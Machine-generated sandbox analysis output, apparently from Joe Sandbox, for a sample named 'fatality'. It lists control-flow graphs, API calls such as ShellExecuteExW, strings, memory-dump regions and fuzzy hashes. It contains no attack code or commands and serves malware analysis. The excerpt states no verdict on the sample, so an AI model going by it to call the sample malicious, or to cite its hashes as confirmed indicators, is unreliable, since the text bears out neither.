                                                                                                                                                            control_flow_graph 603 8edd80-8edd87 604 8edd8e-8edd93 603->604 605 8ee02a-8ee035 604->605 606 8edd99-8edda2 604->606 609 8ee03b-8ee03f 605->609 610 8ee159-8ee174 call 908cce 605->610 607 8eddae-8eddb5 606->607 608 8edda4-8edda8 606->608 613 8eddbb-8eddde 607->613 614 8edf29-8edf3a call 8f045b 607->614 608->605 608->607 611 8ee090-8ee096 609->611 612 8ee041-8ee047 609->612 638 8ee1af-8ee1bb 610->638 639 8ee176-8ee17e 610->639 621 8ee098-8ee09e 611->621 622 8ee0b6-8ee0ba 611->622 616 8ee04d-8ee054 612->616 617 8ee150-8ee153 612->617 618 8edde5-8ede07 call 903e13 call 906088 613->618 636 8ee024-8ee027 614->636 637 8edf40-8edf69 call 8f0602 call 906105 614->637 625 8ee07b 616->625 626 8ee056-8ee059 616->626 617->604 617->610 662 8ede09-8ede16 618->662 663 8ede22 618->663 621->622 630 8ee0a0-8ee0a6 621->630 623 8ee145-8ee14a 622->623 624 8ee0c0-8ee0d5 call 908cce 622->624 632 8ee14d 623->632 651 8ee0d7-8ee0df 624->651 652 8ee110-8ee11c 624->652 640 8ee07d-8ee08b 625->640 633 8ee05b-8ee05e 626->633 634 8ee077-8ee079 626->634 630->617 641 8ee0ac-8ee0b1 630->641 632->617 645 8ee073-8ee075 633->645 646 8ee060-8ee063 633->646 634->640 636->605 637->636 678 8edf6f-8edfe5 call 8f1da7 call 8f05a7 call 8f0580 call 8f05a7 call 906159 637->678 642 8ee1bd 638->642 643 8ee1c0-8ee1fb call 907625 call 8ee27c call 903e2e * 2 638->643 649 8ee17f-8ee185 639->649 640->632 641->632 642->643 710 8ee1fd-8ee212 call 8ee261 * 2 643->710 711 8ee214-8ee248 call 906310 * 2 call 8e959a 643->711 645->640 653 8ee06f-8ee071 646->653 654 8ee065-8ee069 646->654 657 8ee18d-8ee198 649->657 658 8ee187-8ee18b 649->658 660 8ee0e0-8ee0e6 651->660 665 8ee11e 652->665 666 8ee121-8ee142 call 907625 call 8ee27c 652->666 653->640 654->641 661 8ee06b-8ee06d 654->661 657->649 667 8ee19a-8ee19c 657->667 658->657 658->667 669 8ee0ee-8ee0f9 660->669 670 8ee0e8-8ee0ec 660->670 661->640 662->663 671 8ede18-8ede20 662->671 673 8ede25-8ede29 663->673 665->666 666->623 667->638 675 8ee19e-8ee1a6 667->675 669->660 677 8ee0fb-8ee0fd 669->677 670->669 670->677 671->673 673->618 679 8ede2b-8ede38 673->679 675->638 681 8ee1a8-8ee1aa 675->681 677->652 684 8ee0ff-8ee107 677->684 734 8edfe7-8edff0 678->734 735 8edff3-8ee006 678->735 686 8ede3a-8ede48 call 8f05a7 679->686 687 8ede55-8ede5b 679->687 681->638 684->652 691 8ee109-8ee10b 684->691 694 8ede4d-8ede50 686->694 687->614 689 8ede61-8ede6b 687->689 695 8ede6d-8ede71 689->695 696 8ede73-8ede74 689->696 691->652 694->617 695->696 700 8ede76-8ede8a 695->700 696->689 703 8ede8c-8ede8f 700->703 704 8edeab-8eded6 call 8f1da7 700->704 707 8edea8 703->707 708 8ede91-8edea6 703->708 718 8edefc-8edf04 704->718 719 8eded8-8edef7 call 903e49 704->719 707->704 708->703 708->707 710->711 736 8ee24d-8ee25e 711->736 721 8edf0b-8edf24 call 8ee5b1 718->721 722 8edf06 718->722 719->694 721->694 722->721 734->735 737 8ee009-8ee011 735->737 738 8ee019-8ee01a 737->738 739 8ee013-8ee017 737->739 738->737 739->738 740 8ee01c-8ee01f 739->740 740->617
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __fprintf_l_wcslen
                                                                                                                                                            • String ID: ,$$%s:$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                                                            • API String ID: 2299889570-2003356997
                                                                                                                                                            • Opcode ID: a093a6b8739172a20d703462364338fa0af2d86b5c712c12fa83747bb72ff5ba
                                                                                                                                                            • Instruction ID: 3d91932e0284996a9f9320921729fe788b3f57c339b7f5c597b33d3b900538d9
                                                                                                                                                            • Opcode Fuzzy Hash: a093a6b8739172a20d703462364338fa0af2d86b5c712c12fa83747bb72ff5ba
                                                                                                                                                            • Instruction Fuzzy Hash: E1E1EF31900299EFCF24EF69C841AE977B5FF5A304F40451AF946DB281EBB1E985CB50
                                                                                                                                                            Function 008FD78F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 184COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 741 8fd78f-8fd7a7 call 8fec50 744 8fd7ad-8fd7b9 call 903e13 741->744 745 8fd9e8-8fd9f0 741->745 744->745 748 8fd7bf-8fd7e7 call 8ffff0 744->748 751 8fd7e9 748->751 752 8fd7f1-8fd7ff 748->752 751->752 753 8fd812-8fd818 752->753 754 8fd801-8fd804 752->754 756 8fd85b-8fd85e 753->756 755 8fd808-8fd80e 754->755 757 8fd837-8fd844 755->757 758 8fd810 755->758 756->755 759 8fd860-8fd866 756->759 761 8fd84a-8fd84e 757->761 762 8fd9c0-8fd9c2 757->762 760 8fd822-8fd82c 758->760 763 8fd86d-8fd86f 759->763 764 8fd868-8fd86b 759->764 765 8fd82e 760->765 766 8fd81a-8fd820 760->766 767 8fd9c6 761->767 768 8fd854-8fd859 761->768 762->767 769 8fd882-8fd898 call 8eb92d 763->769 770 8fd871-8fd878 763->770 764->763 764->769 765->757 766->760 773 8fd830-8fd833 766->773 774 8fd9cf 767->774 768->756 777 8fd89a-8fd8a7 call 8f1fbb 769->777 778 8fd8b1-8fd8bc call 8ea231 769->778 770->769 771 8fd87a 770->771 771->769 773->757 776 8fd9d6-8fd9d8 774->776 779 8fd9da-8fd9dc 776->779 780 8fd9e7 776->780 777->778 786 8fd8a9 777->786 787 8fd8be-8fd8d5 call 8eb6c4 778->787 788 8fd8d9-8fd8e6 ShellExecuteExW 778->788 779->780 783 8fd9de-8fd9e1 ShowWindow 779->783 780->745 783->780 786->778 787->788 788->780 790 8fd8ec-8fd8f9 788->790 791 8fd90c-8fd90e 790->791 792 8fd8fb-8fd902 790->792 795 8fd925-8fd944 call 8fdc3b 791->795 796 8fd910-8fd919 791->796 792->791 794 8fd904-8fd90a 792->794 794->791 797 8fd97b-8fd987 794->797 795->797 808 8fd946-8fd94e 795->808 796->795 801 8fd91b-8fd923 ShowWindow 796->801 803 8fd989-8fd996 call 8f1fbb 797->803 804 8fd998-8fd9a6 797->804 801->795 803->774 803->804 804->776 807 8fd9a8-8fd9aa 804->807 807->776 810 8fd9ac-8fd9b2 807->810 808->797 811 8fd950-8fd961 808->811 810->776 812 8fd9b4-8fd9be 810->812 811->797 814 8fd963-8fd96d 811->814 812->776 815 8fd96f 814->815 816 8fd974 814->816 815->816 816->797
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ShowWindow$ExecuteShell_wcslen
                                                                                                                                                            • String ID: .exe$.inf$Install
                                                                                                                                                            • API String ID: 855908426-1844831949
                                                                                                                                                            • Opcode ID: eff4b0ea3d1d7ec5f77c128baa44d050b1f255bce4e503b3d3c0fac9e1cd239e
                                                                                                                                                            • Instruction ID: a4781505260628bdcec1514becbc090176cfeb2d6228c24f5c051fcaa120cccf
                                                                                                                                                            • Opcode Fuzzy Hash: eff4b0ea3d1d7ec5f77c128baa44d050b1f255bce4e503b3d3c0fac9e1cd239e
                                                                                                                                                            • Instruction Fuzzy Hash: A551F471618388AADB309B749844BBBBBE6FF86744F04482DF7C0D71A1D7B08985DB12
                                                                                                                                                            Function 008FABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 817 8fabab-8fabca GetClassNameW 818 8fabcc-8fabe1 call 8f1fbb 817->818 819 8fabf2-8fabf4 817->819 824 8fabe3-8fabef FindWindowExW 818->824 825 8fabf1 818->825 821 8fabff-8fac01 819->821 822 8fabf6-8fabf9 SHAutoComplete 819->822 822->821 824->825 825->819
                                                                                                                                                            APIs
                                                                                                                                                            • GetClassNameW.USER32(?,?,00000050), ref: 008FABC2
                                                                                                                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 008FABE9
                                                                                                                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 008FABF9
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AutoClassCompleteFindNameWindow
                                                                                                                                                            • String ID: EDIT
                                                                                                                                                            • API String ID: 1162832696-3080729518
                                                                                                                                                            • Opcode ID: 96c293bb41a3e1620097dba3fd63a5d8fdfb0849de3481c8ef0b652e8e9722df
                                                                                                                                                            • Instruction ID: 22ec51ae9f5fb87263c8a0146127c8295e65ccf9b9878007f980726c884d2dac
                                                                                                                                                            • Opcode Fuzzy Hash: 96c293bb41a3e1620097dba3fd63a5d8fdfb0849de3481c8ef0b652e8e9722df
                                                                                                                                                            • Instruction Fuzzy Hash: FAF0827670022D76DB3096749C0AFEB77ACEF46B61F484111BA45E21C0DB60DA41C5B6
                                                                                                                                                            Function 008FAC16 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34comCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 008FAC2F
                                                                                                                                                            • SHGetMalloc.SHELL32(00928438), ref: 008FAC70
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeMalloc
                                                                                                                                                            • String ID: riched20.dll$3Ro
                                                                                                                                                            • API String ID: 48681180-3613677438
                                                                                                                                                            • Opcode ID: 410036a871970825be85d6207bfd82d4809a76d0efee5c02fc5306cc07922fc6
                                                                                                                                                            • Instruction ID: f213e4e046910c940b230d76eed899e3323b92aa6ea12c5a0e4ff4e8badbfcce
                                                                                                                                                            • Opcode Fuzzy Hash: 410036a871970825be85d6207bfd82d4809a76d0efee5c02fc5306cc07922fc6
                                                                                                                                                            • Instruction Fuzzy Hash: 01F044B5D00209ABCB10AFA9D8499EFFBFCEF85704F10812AA801E2251DBB456058FA1
                                                                                                                                                            Function 009097FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • _free.LIBCMT ref: 0090981C
                                                                                                                                                              • Part of subcall function 00908DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0090C896,?,00000000,?,00000000,?,0090C8BD,?,00000007,?,?,0090CCBA,?), ref: 00908DE2
                                                                                                                                                            • _free.LIBCMT ref: 009098A3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap
                                                                                                                                                            • String ID: 4
                                                                                                                                                            • API String ID: 2929853658-1536075910
                                                                                                                                                            • Opcode ID: 6100d8aedebe9392aa26f2568426f95284433358b27dfba387effe0837aef50d
                                                                                                                                                            • Instruction ID: fc56b4ab724088df6bbfe8853f506854fde2718865ef7405385bc81d6c8bd5f3
                                                                                                                                                            • Opcode Fuzzy Hash: 6100d8aedebe9392aa26f2568426f95284433358b27dfba387effe0837aef50d
                                                                                                                                                            • Instruction Fuzzy Hash: D401D437318A016FD3166678AC49A9B16ADDBC27B1B328135FA15D73D3FE248C029164
                                                                                                                                                            Function 0090A95B Relevance: 4.7, APIs: 3, Instructions: 216COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 861 90a95b-90a974 862 90a976-90a986 call 90ef4c 861->862 863 90a98a-90a98f 861->863 862->863 868 90a988 862->868 865 90a991-90a999 863->865 866 90a99c-90a9c0 863->866 865->866 870 90ab53-90ab66 call 8ffbbc 866->870 871 90a9c6-90a9d2 866->871 868->863 872 90a9d4-90a9e5 871->872 873 90aa26 871->873 875 90aa04-90aa15 call 908e06 872->875 876 90a9e7-90a9f6 call 912010 872->876 878 90aa28-90aa2a 873->878 882 90ab48 875->882 888 90aa1b 875->888 876->882 887 90a9fc-90aa02 876->887 881 90aa30-90aa43 878->881 878->882 881->882 892 90aa49-90aa5b call 90af6c 881->892 883 90ab4a-90ab51 call 90abc3 882->883 883->870 891 90aa21-90aa24 887->891 888->891 891->878 894 90aa60-90aa64 892->894 894->882 895 90aa6a-90aa71 894->895 896 90aa73-90aa78 895->896 897 90aaab-90aab7 895->897 896->883 898 90aa7e-90aa80 896->898 899 90ab03 897->899 900 90aab9-90aaca 897->900 898->882 901 90aa86-90aaa0 call 90af6c 898->901 902 90ab05-90ab07 899->902 903 90aae5-90aaf6 call 908e06 900->903 904 90aacc-90aadb call 912010 900->904 901->883 917 90aaa6 901->917 907 90ab41-90ab47 call 90abc3 902->907 908 90ab09-90ab22 call 90af6c 902->908 903->907 916 90aaf8 903->916 904->907 919 90aadd-90aae3 904->919 907->882 908->907 921 90ab24-90ab2b 908->921 920 90aafe-90ab01 916->920 917->882 919->920 920->902 922 90ab67-90ab6d 921->922 923 90ab2d-90ab2e 921->923 924 90ab2f-90ab3f 922->924 923->924 924->907 926 90ab6f-90ab76 call 90abc3 924->926 926->883
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __freea
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 240046367-0
                                                                                                                                                            • Opcode ID: a32618ac9ab1fe5113cb8c539200f6bb32bfa6cf45ecf643f90ac7981fdbe9de
                                                                                                                                                            • Instruction ID: 420b39637fdc82458f539e16b4037f8128813f584bcf85f14e839b17251e29e0
                                                                                                                                                            • Opcode Fuzzy Hash: a32618ac9ab1fe5113cb8c539200f6bb32bfa6cf45ecf643f90ac7981fdbe9de
                                                                                                                                                            • Instruction Fuzzy Hash: 1D51BD72A10316AFDB258E64CC41FBBB7AAEF84750B158629FD05D61D0EB34DC90C6E2
                                                                                                                                                            Function 008FA6C2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 929 8fa6c2-8fa6df 931 8fa7db 929->931 932 8fa6e5-8fa6f6 929->932 933 8fa7dd-8fa7e1 931->933 932->931 935 8fa6fc-8fa70b 932->935 935->931 937 8fa711-8fa71c 935->937 937->931 939 8fa722-8fa737 937->939 941 8fa73d-8fa746 939->941 942 8fa7d3-8fa7d9 939->942 944 8fa7cc 941->944 945 8fa74c-8fa76a call 900320 CreateStreamOnHGlobal 941->945 942->933 944->942 948 8fa76c-8fa78e call 8fa626 945->948 949 8fa7c5 945->949 948->949 954 8fa790-8fa798 948->954 949->944 955 8fa79a-8fa7a7 call 8feb26 954->955 956 8fa7b3-8fa7c1 954->956 958 8fa7ac-8fa7ae 955->958 956->949 958->956 960 8fa7b0 958->960 960->956
                                                                                                                                                            APIs
                                                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 008FA762
                                                                                                                                                              • Part of subcall function 008FA626: 735A6BB0.GDIPLUS(00000010), ref: 008FA62C
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateGlobalStream
                                                                                                                                                            • String ID: PNG
                                                                                                                                                            • API String ID: 2244384528-364855578
                                                                                                                                                            • Opcode ID: 7d478d1211d19afdf954d9a6c00c7c52a8dae62ff1ec4b79ae744dd1e68b4191
                                                                                                                                                            • Instruction ID: 6001558a26f1fd378612e95ac92f6a9bd1a923c167e6074a4cb823c2b7887351
                                                                                                                                                            • Opcode Fuzzy Hash: 7d478d1211d19afdf954d9a6c00c7c52a8dae62ff1ec4b79ae744dd1e68b4191
                                                                                                                                                            • Instruction Fuzzy Hash: F631A1B560830ABFD714AF31EC48D6B7FB9FF84760B108528F949D2260EB31D940EA61
                                                                                                                                                            Function 008E1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 991 8e1e50-8e1e7f call 8feb78 call 8e3bba 995 8e1e84-8e1e86 991->995 996 8e1f0f-8e1f1b 995->996 997 8e1e8c-8e1ebd call 8e1732 call 8e18a9 995->997 998 8e1f1d-8e1f21 996->998 999 8e1f36-8e1f44 996->999 1010 8e1ece-8e1ed5 997->1010 1011 8e1ebf-8e1ecc call 8f1c3b 997->1011 1002 8e1f2f-8e1f35 call 903e2e 998->1002 1003 8e1f23-8e1f2c call 8ef445 998->1003 1002->999 1003->1002 1013 8e1eee-8e1ef6 call 8f1b84 1010->1013 1014 8e1ed7-8e1eec call 8f1bfd 1010->1014 1018 8e1efb-8e1f0e call 903e13 call 8e18a9 1011->1018 1013->1018 1014->1018 1018->996
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E1E55
                                                                                                                                                              • Part of subcall function 008E3BBA: __EH_prolog.LIBCMT ref: 008E3BBF
                                                                                                                                                            • _wcslen.LIBCMT ref: 008E1EFD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
